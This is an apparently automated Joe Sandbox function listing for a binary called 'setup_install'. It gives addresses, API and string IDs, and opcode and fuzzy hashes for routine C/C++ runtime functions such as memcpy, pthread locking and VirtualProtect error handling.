                                                                                                                            • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
                                                                                                                            • API String ID: 544645111-395989641
                                                                                                                            • Opcode ID: a5e4531d6643eac522ac3431ea60ebcc3a6f03eccb630772531680c449ba7565
                                                                                                                            • Instruction ID: 2a3650effdda8023296522a2e1b9c2b601fe2446819888916e7596a4c59b854c
                                                                                                                            • Opcode Fuzzy Hash: a5e4531d6643eac522ac3431ea60ebcc3a6f03eccb630772531680c449ba7565
                                                                                                                            • Instruction Fuzzy Hash: C6A18F70A04205CBDB10EF68D4C035AB7A0BF85328F15873BD998AB3D1D77D9851DB9A
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00485BA0 Relevance: 13.7, APIs: 8, Strings: 1, Instructions: 232COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            • basic_string::_M_replace, xrefs: 00485EA6
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.287032717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.287009661.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287101526.000000000049F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287122632.00000000004A1000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287156446.00000000004E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287161062.00000000004E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287176297.000000000050C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_400000_setup_install.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: memmove$memcpy
                                                                                                                            • String ID: basic_string::_M_replace
                                                                                                                            • API String ID: 3033661859-2323331477
                                                                                                                            • Opcode ID: 707ef33640ec665662e4d7760efb785f663b8d26f5177e49e9376091a2a52c06
                                                                                                                            • Instruction ID: 3a3bb93cae72a6f8e96f2cf1240860382bc7fbf5e6fa30f5cb428e0dc830b0fc
                                                                                                                            • Opcode Fuzzy Hash: 707ef33640ec665662e4d7760efb785f663b8d26f5177e49e9376091a2a52c06
                                                                                                                            • Instruction Fuzzy Hash: 9E91E4749097158BC714EF28C18446EBBF1EF89744F148C2EE98587324E735E984DB9A
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00482E20 Relevance: 13.7, APIs: 8, Strings: 1, Instructions: 214COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            • basic_string::_M_replace, xrefs: 004830FC
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.287032717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.287009661.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287101526.000000000049F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287122632.00000000004A1000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287156446.00000000004E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287161062.00000000004E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287176297.000000000050C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_400000_setup_install.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: memmove$memcpy
                                                                                                                            • String ID: basic_string::_M_replace
                                                                                                                            • API String ID: 3033661859-2323331477
                                                                                                                            • Opcode ID: 2cc161432016d94adc55a5e58c5d8a5781da215b1a666d60898411bb434c276f
                                                                                                                            • Instruction ID: f2430472c550f5e7e5d8044af09173fc45ee225ca78cfe8f468da064fc97533f
                                                                                                                            • Opcode Fuzzy Hash: 2cc161432016d94adc55a5e58c5d8a5781da215b1a666d60898411bb434c276f
                                                                                                                            • Instruction Fuzzy Hash: 70813774A083958FC311EF28C19052EFBE1BF8A744F148D5EE8C897315D2B9D985DB8A
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040C840 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 106COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            • VirtualProtect failed with code 0x%x, xrefs: 0040C93A
                                                                                                                            • VirtualQuery failed for %d bytes at address %p, xrefs: 0040C967
                                                                                                                            • @, xrefs: 0040C918
                                                                                                                            • Address %p has no image-section, xrefs: 0040C97B
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.287032717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.287009661.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287101526.000000000049F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287122632.00000000004A1000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287156446.00000000004E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287161062.00000000004E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287176297.000000000050C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_400000_setup_install.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: QueryVirtual
                                                                                                                            • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$@$Address %p has no image-section
                                                                                                                            • API String ID: 1804819252-1098444051
                                                                                                                            • Opcode ID: d11a7c15de3391fa196e004d1c7e0445e035ee48827a10276d86a5b9943fc430
                                                                                                                            • Instruction ID: 9fa81ea4eb2596a2b4e31d77e659edf4199b7274cbe4ccebacc6a10bfc59c6a3
                                                                                                                            • Opcode Fuzzy Hash: d11a7c15de3391fa196e004d1c7e0445e035ee48827a10276d86a5b9943fc430
                                                                                                                            • Instruction Fuzzy Hash: A7416DB2904741CBC710EF69D9C461AFBE0FB95354F058A7EE8889B251E374E8048B99
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00426500 Relevance: 12.2, APIs: 6, Strings: 2, Instructions: 250stringCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.287032717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.287009661.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287101526.000000000049F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287122632.00000000004A1000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287156446.00000000004E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287161062.00000000004E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287176297.000000000050C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_400000_setup_install.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: strlen$memcpystrcmp
                                                                                                                            • String ID: *$basic_string::append
                                                                                                                            • API String ID: 566201450-3732199748
                                                                                                                            • Opcode ID: 4413819e18d01552325f455ecbad3a649a27319530e7784cad5d3f517d3956b8
                                                                                                                            • Instruction ID: c968479cc34bc111703cf3d19786874ce6f65782b875d577a7903ca33e7769f4
                                                                                                                            • Opcode Fuzzy Hash: 4413819e18d01552325f455ecbad3a649a27319530e7784cad5d3f517d3956b8
                                                                                                                            • Instruction Fuzzy Hash: B9A15C75A04215CFCB00EF69D08066EBBF1BF88304F55C96EE8889B345D739E845CB9A
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00426880 Relevance: 10.7, APIs: 6, Strings: 1, Instructions: 196stringCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.287032717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.287009661.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287101526.000000000049F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287122632.00000000004A1000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287156446.00000000004E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287161062.00000000004E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287176297.000000000050C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_400000_setup_install.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: strlen$memcpymemsetstrcmp
                                                                                                                            • String ID: *
                                                                                                                            • API String ID: 1303273620-163128923
                                                                                                                            • Opcode ID: 1d3d3fc57b9882437ade1fbde089e648a3312e205ec221e62430a5bf37c43105
                                                                                                                            • Instruction ID: 9be9598921780d390ec6ae947ddba6dd75223b65da84748f08ecd6d874c8442b
                                                                                                                            • Opcode Fuzzy Hash: 1d3d3fc57b9882437ade1fbde089e648a3312e205ec221e62430a5bf37c43105
                                                                                                                            • Instruction Fuzzy Hash: 87816CB5A056108FCB00EF69D48465EFBF5FF89704F0185AEE8849B325C735A849CB86
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0041BAC0 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryloaderCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.287032717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.287009661.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287101526.000000000049F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287122632.00000000004A1000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287156446.00000000004E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287161062.00000000004E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287176297.000000000050C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_400000_setup_install.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressProc$HandleModule
                                                                                                                            • String ID: ___lc_codepage_func$__lc_codepage$msvcrt.dll
                                                                                                                            • API String ID: 667068680-1145701848
                                                                                                                            • Opcode ID: 762180e1abd61e04a3521222b128940255a8c2198328e82bac3a86ba5a2cb4d7
                                                                                                                            • Instruction ID: 847099a3e1288db480877d800f196f3cbb0752664eb3ca913ded4e1a13b9f17d
                                                                                                                            • Opcode Fuzzy Hash: 762180e1abd61e04a3521222b128940255a8c2198328e82bac3a86ba5a2cb4d7
                                                                                                                            • Instruction Fuzzy Hash: 3AF062B09496008B8700BF39AE4919A7AE4EA14350F05847BD889CB215E7799484CBEA
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040669B Relevance: 9.3, APIs: 4, Strings: 2, Instructions: 315stringCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.287032717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.287009661.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287101526.000000000049F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287122632.00000000004A1000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287156446.00000000004E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287161062.00000000004E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287176297.000000000050C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_400000_setup_install.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: strcmp
                                                                                                                            • String ID: )$e0J
                                                                                                                            • API String ID: 1004003707-586159543
                                                                                                                            • Opcode ID: 06445ddd9024c23b2fdac3efa4a1f0d2b70b1774ea265399b2662335041f0146
                                                                                                                            • Instruction ID: a6628597a96266a479ceec04f6538f7c0b0fc6d2008b7a7a8952ffca7adbd22d
                                                                                                                            • Opcode Fuzzy Hash: 06445ddd9024c23b2fdac3efa4a1f0d2b70b1774ea265399b2662335041f0146
                                                                                                                            • Instruction Fuzzy Hash: A7E11B74608202CFCB11CF28C48479AB7E1BF95314F19857AEC889F346C779AC85DB96
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004960C0 Relevance: 9.3, APIs: 6, Instructions: 262COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • pthread_once.LIBWINPTHREAD-1 ref: 004960EF
                                                                                                                            • pthread_mutex_lock.LIBWINPTHREAD-1 ref: 004960FC
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.287032717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.287009661.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287101526.000000000049F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287122632.00000000004A1000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287156446.00000000004E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287161062.00000000004E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287176297.000000000050C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_400000_setup_install.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: pthread_mutex_lockpthread_once
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1659557605-0
                                                                                                                            • Opcode ID: 0f56fd200bc74960018183a610df7cec1f2606659ca1af606d7e143e9e255946
                                                                                                                            • Instruction ID: 6c626885094d160568e008fd176e44a2984f9e8002bd242a2a27bb51ae630efc
                                                                                                                            • Opcode Fuzzy Hash: 0f56fd200bc74960018183a610df7cec1f2606659ca1af606d7e143e9e255946
                                                                                                                            • Instruction Fuzzy Hash: CE918B715097008BCF217F76888626EBEE0AF42348F15883FE8805B746DB7C9885D79E
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00412500 Relevance: 9.2, APIs: 6, Instructions: 221COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.287032717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.287009661.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287101526.000000000049F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287122632.00000000004A1000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287156446.00000000004E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287161062.00000000004E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287176297.000000000050C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_400000_setup_install.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _errno_fileno_lseeki64
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1152433503-0
                                                                                                                            • Opcode ID: e784bf6cde7cdd33a9b6b193840e90b409af2b780afc8d2ceac4d3911a1f3975
                                                                                                                            • Instruction ID: 142ae142fb8e88e5d51e4685e6ffd7e7bc2ab57e7b7159ba8ad73af44c40b42f
                                                                                                                            • Opcode Fuzzy Hash: e784bf6cde7cdd33a9b6b193840e90b409af2b780afc8d2ceac4d3911a1f3975
                                                                                                                            • Instruction Fuzzy Hash: 57915DB16083118FC710CF18C58074BBBE1FBC8364F198A5EE8989B391D7B5E949CB96
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00410A90 Relevance: 9.1, APIs: 6, Instructions: 76COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • pthread_once.LIBWINPTHREAD-1 ref: 00410AA6
                                                                                                                            • pthread_mutex_lock.LIBWINPTHREAD-1 ref: 00410AB2
                                                                                                                            • pthread_mutex_unlock.LIBWINPTHREAD-1 ref: 00410B21
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.287032717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.287009661.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287101526.000000000049F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287122632.00000000004A1000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287156446.00000000004E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287161062.00000000004E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287176297.000000000050C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_400000_setup_install.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: pthread_mutex_lockpthread_mutex_unlockpthread_once
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3726264613-0
                                                                                                                            • Opcode ID: b23420f4f995adb78e0c63dcee8737b3b8f5fcaec87428bcfc055c41e9ee546e
                                                                                                                            • Instruction ID: ba41883d1dfb1aeed4d7907c95839b94295631c979651d89378a4a59f2492237
                                                                                                                            • Opcode Fuzzy Hash: b23420f4f995adb78e0c63dcee8737b3b8f5fcaec87428bcfc055c41e9ee546e
                                                                                                                            • Instruction Fuzzy Hash: 97214A702183518BCB24EF65D5C069BB7E0AF14349F05856BE9855B346C3B8E8C0CB6A
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00412450 Relevance: 9.1, APIs: 6, Instructions: 54COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.287032717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.287009661.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287101526.000000000049F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287122632.00000000004A1000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287156446.00000000004E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287161062.00000000004E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287176297.000000000050C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_400000_setup_install.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _errno_filelengthi64_filenofflushfgetposfsetpos
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4183758535-0
                                                                                                                            • Opcode ID: 9d65a2e58eea1c795345f51a06ddb52dfef2a54dae194bd1b75247084d76a343
                                                                                                                            • Instruction ID: ec32e567e66a5fec8b89ba3cf328b758b98709376b0703e93491ef9b76168271
                                                                                                                            • Opcode Fuzzy Hash: 9d65a2e58eea1c795345f51a06ddb52dfef2a54dae194bd1b75247084d76a343
                                                                                                                            • Instruction Fuzzy Hash: 771128B19183058BC310AF668A8009FBBE0EED5364F20491FF9D487362E37999D58BC6
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00422290 Relevance: 9.0, APIs: 6, Instructions: 50stringCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.287032717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.287009661.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287101526.000000000049F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287122632.00000000004A1000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287156446.00000000004E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287161062.00000000004E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287176297.000000000050C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_400000_setup_install.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: setlocale$memcpystrlenwcsftime
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3412479102-0
                                                                                                                            • Opcode ID: b7a624a0e653be58194c276feb310dc277f1ceb7f8d43525f5270865520c70e4
                                                                                                                            • Instruction ID: bab3182e20dbff31d44beb34e2dc14242109b18a0727d9061a797803e7bf4f51
                                                                                                                            • Opcode Fuzzy Hash: b7a624a0e653be58194c276feb310dc277f1ceb7f8d43525f5270865520c70e4
                                                                                                                            • Instruction Fuzzy Hash: 511198B09193049FD740BF6AC58565FBBE4EF88754F85882EF4C887311E77898418B96
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004647F0 Relevance: 9.0, APIs: 6, Instructions: 45COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.287032717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.287009661.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287101526.000000000049F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287122632.00000000004A1000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287156446.00000000004E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287161062.00000000004E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287176297.000000000050C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_400000_setup_install.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _errno$fflush
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3480992530-0
                                                                                                                            • Opcode ID: 09f9c98f2fc083901ac10fa9199fd2e109f087755087181fa29331726d13bd26
                                                                                                                            • Instruction ID: 61404978c690aa299dfc5e86436015507991471bab41e7d1f3fa74e017236233
                                                                                                                            • Opcode Fuzzy Hash: 09f9c98f2fc083901ac10fa9199fd2e109f087755087181fa29331726d13bd26
                                                                                                                            • Instruction Fuzzy Hash: FDF08C766002548FCB117F6AAC40617BB98EFE2755F0600BBE9048B221E2359C148AAB
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00410D50 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 106COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • pthread_once.LIBWINPTHREAD-1 ref: 00410D6E
                                                                                                                            • pthread_mutex_lock.LIBWINPTHREAD-1 ref: 00410D7A
                                                                                                                            • pthread_mutex_unlock.LIBWINPTHREAD-1 ref: 00410DFE
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.287032717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.287009661.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287101526.000000000049F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287122632.00000000004A1000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287156446.00000000004E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287161062.00000000004E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287176297.000000000050C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_400000_setup_install.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: pthread_mutex_lockpthread_mutex_unlockpthread_once
                                                                                                                            • String ID: cI
                                                                                                                            • API String ID: 3726264613-2783008204
                                                                                                                            • Opcode ID: e4fc19f00ea340a5dc2fa0924e8e24e75c0ec3264cbaad9b1a074486b98dea00
                                                                                                                            • Instruction ID: 98bb0a7a15a6d1f2e67aebefce4be61813c49d2bca08f458159b7a710f4bfaab
                                                                                                                            • Opcode Fuzzy Hash: e4fc19f00ea340a5dc2fa0924e8e24e75c0ec3264cbaad9b1a074486b98dea00
                                                                                                                            • Instruction Fuzzy Hash: D7314C70604759CBC710EF6AE58069A77E5EF44709B00853FE9488B341EBB8ECC5CB99
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040C8FC Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 58memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • VirtualQuery.KERNEL32 ref: 0040C8CD
                                                                                                                            • VirtualProtect.KERNEL32 ref: 0040C927
                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004AACC8), ref: 0040C934
                                                                                                                              • Part of subcall function 00498680: fwrite.MSVCRT ref: 004986AF
                                                                                                                              • Part of subcall function 00498680: vfprintf.MSVCRT ref: 004986CF
                                                                                                                              • Part of subcall function 00498680: abort.MSVCRT ref: 004986D4
                                                                                                                              • Part of subcall function 00498680: abort.MSVCRT ref: 004986DC
                                                                                                                              • Part of subcall function 00498680: abort.MSVCRT ref: 004986E1
                                                                                                                              • Part of subcall function 00498680: abort.MSVCRT ref: 004986E6
                                                                                                                              • Part of subcall function 00498680: abort.MSVCRT ref: 004986EB
                                                                                                                              • Part of subcall function 00498680: abort.MSVCRT ref: 004986F0
                                                                                                                              • Part of subcall function 00498680: abort.MSVCRT(0040F76B), ref: 004986F5
                                                                                                                              • Part of subcall function 00498680: abort.MSVCRT(0040F76B), ref: 004986FA
